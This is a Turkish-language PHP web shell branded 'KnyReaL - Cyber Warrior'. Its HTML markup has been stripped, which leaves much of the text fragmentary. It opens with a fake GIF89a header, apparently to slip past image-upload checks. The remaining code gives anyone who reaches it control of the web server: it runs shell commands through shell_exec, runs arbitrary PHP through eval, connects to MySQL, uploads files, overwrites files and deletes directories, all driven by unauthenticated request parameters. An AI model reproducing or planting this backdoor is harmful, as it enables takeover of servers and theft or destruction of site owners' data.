GIF89;a KnyReaL - Cyber Warrior
Cyber Warrior
KnyReaL tarafından "Lojistik Destek" için hazırlanmıştır.
Sistem Bilgileri
'.date("d-m-Y - H:i").''; ?>
Güvenli Mod :
Açık'; }else{ echo 'Kapalı'; }?>
Senin Ip : Server Ip : Server Port :
Uname -a :
Sürümler :
Curl : Açık'; }else{ echo "Kapalı"; } ?>MySql : Açık'; }else{ echo "Kapalı"; } ?>

Dizin işlemleri : Dizine Dosya Yükle :
?knyreal=KnyReaLDosyaYukle&dizinyolu=" method="post" enctype="multipart/form-data">
';}else{echo '';}echo '';echo '';echo '';}else{if(DzIslm($DizinAdi)){echo '';}else{echo '';}echo '';echo '';echo '';}}closedir($DizinLs);}}?>
Dizin izinler Boyut Işlem
'.$DizinAdi.'
'.$DizinAdi.'
'.KnyRealizinGoster($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['KnyReaLDizinAdi'].'/'.$DizinAdi).''.@filesize($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['KnyReaLDizinAdi'].'/'.$DizinAdi).'Sil
'.$DizinAdi.'
'.$DizinAdi.'
'.KnyRealizinGoster($_SERVER["DOCUMENT_ROOT"].'/'.$DizinAdi).''.@filesize($_SERVER["DOCUMENT_ROOT"].'/'.$DizinAdi).'Sil

?knyreal=KnyReaLCmdKullan" method="post">
KOMUT ÇALIŞTIR :

MySql Bağlantısı Kur
?knyreal=KnyReaLMysqlBaglan" method="post">
MySql Kodu Çalıştır :Veritabanı Adı :
V. Kullanıcı Adı :
V. Parolası :
Veritabanı Port :

?knyreal=KnyReaLPhpKoduCalistir" method="post">
PHP Kodu Çalıştır :Dosya Silindi
Geri";}else{if($SilTumuCek = glob($SilDizinAdi."/*")){foreach($SilTumuCek as $SilTumuCekLst){is_dir($SilTumuCekLst)? @rmdir($SilTumuCekLst) : unlink($SilTumuCekLst);}}@rmdir($SilDizinAdi);echo "
Silme işlemi başarılı.
Geri
";}}KnyReaLDizinSilFunc($_GET['sildizin']);break;case "KnyReaLDizinDuzenleLnk":if(empty($_GET['sad'])){echo "
işlem gerçekleştirilemez.
Geri
";}else{if(! file_exists($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['sad'])){echo "
işlem gerçekleştirilemez.
Geri
";}else{echo '
BURADASIN : '.$_SERVER["DOCUMENT_ROOT"]."/".$_GET["sad"].'
';}}break;case "KnyReaLDizinDzKayitLnk":if($_GET['duzenle']){if(! file_exists($_GET['duzenle'])){echo "
işlem gerçekleştirilemez.
Geri
";}else{$DsDuzenleKyt = fopen ($_GET['duzenle'] , 'w');fwrite ( $DsDuzenleKyt , $_POST['metinduzunle'] ) ;fclose ($DsDuzenleKyt);echo "
Düzenleme işlemi tamamlandı.
Geri
";}}else{echo "
işlem gerçekleştirilemez.
Geri
";}break;case "KnyReaLMysqlBaglan":if(empty($_POST['VeritabaniAdi']) OR empty($_POST['kullaniciadi']) OR empty($_POST['parola'])){echo "
Mysql bağlantısı başarısız. Boş değerler var.
Geri
";}else{if(empty($_POST['port'])){$veritabaniac = @mysql_connect('localhost',$_POST['kullaniciadi'],$_POST['parola']);}else{$veritabaniac = @mysql_connect('localhost:'.$_POST['port'],$_POST['kullaniciadi'],$_POST['parola']);}if($veritabaniac){if(@mysql_select_db($_POST['VeritabaniAdi'],$veritabaniac)){$eval = @str_replace("","",$eval);$eval = @str_replace("
ÇALIŞTIRILAN KODDAN DÖNEN SONUÇ - Geri
";@eval("$eval");echo "";}else{echo "
Veritabanı bulunamadı.
Geri
";}}else{echo "
Veritabanına bağlanamadı.
Geri
";}}break;case "KnyReaLPhpKoduCalistir":$eval = @str_replace("","",$eval);$eval = @str_replace("
PHP ÇIKTISI - Geri
";@eval("$eval");echo "";break;case "KnyReaLCmdKullan":echo '
CMD EXECUTE - Geri
';echo "
";$KnyReaLCmdBaslat =shell_exec($_POST['cmd']);echo "
$KnyReaLCmdBaslat
";echo "
";break;case "KnyReaLDosyaYukle":if (move_uploaded_file($_FILES['yukledosya']['tmp_name'], $_GET['dizinyolu'].'/'.$_FILES['yukledosya']['name'])){echo "
Dosya yüklemesi başarılı.
Geri
";}else{echo "
Dosya Yükelenemdi.
Geri
";}break;}?>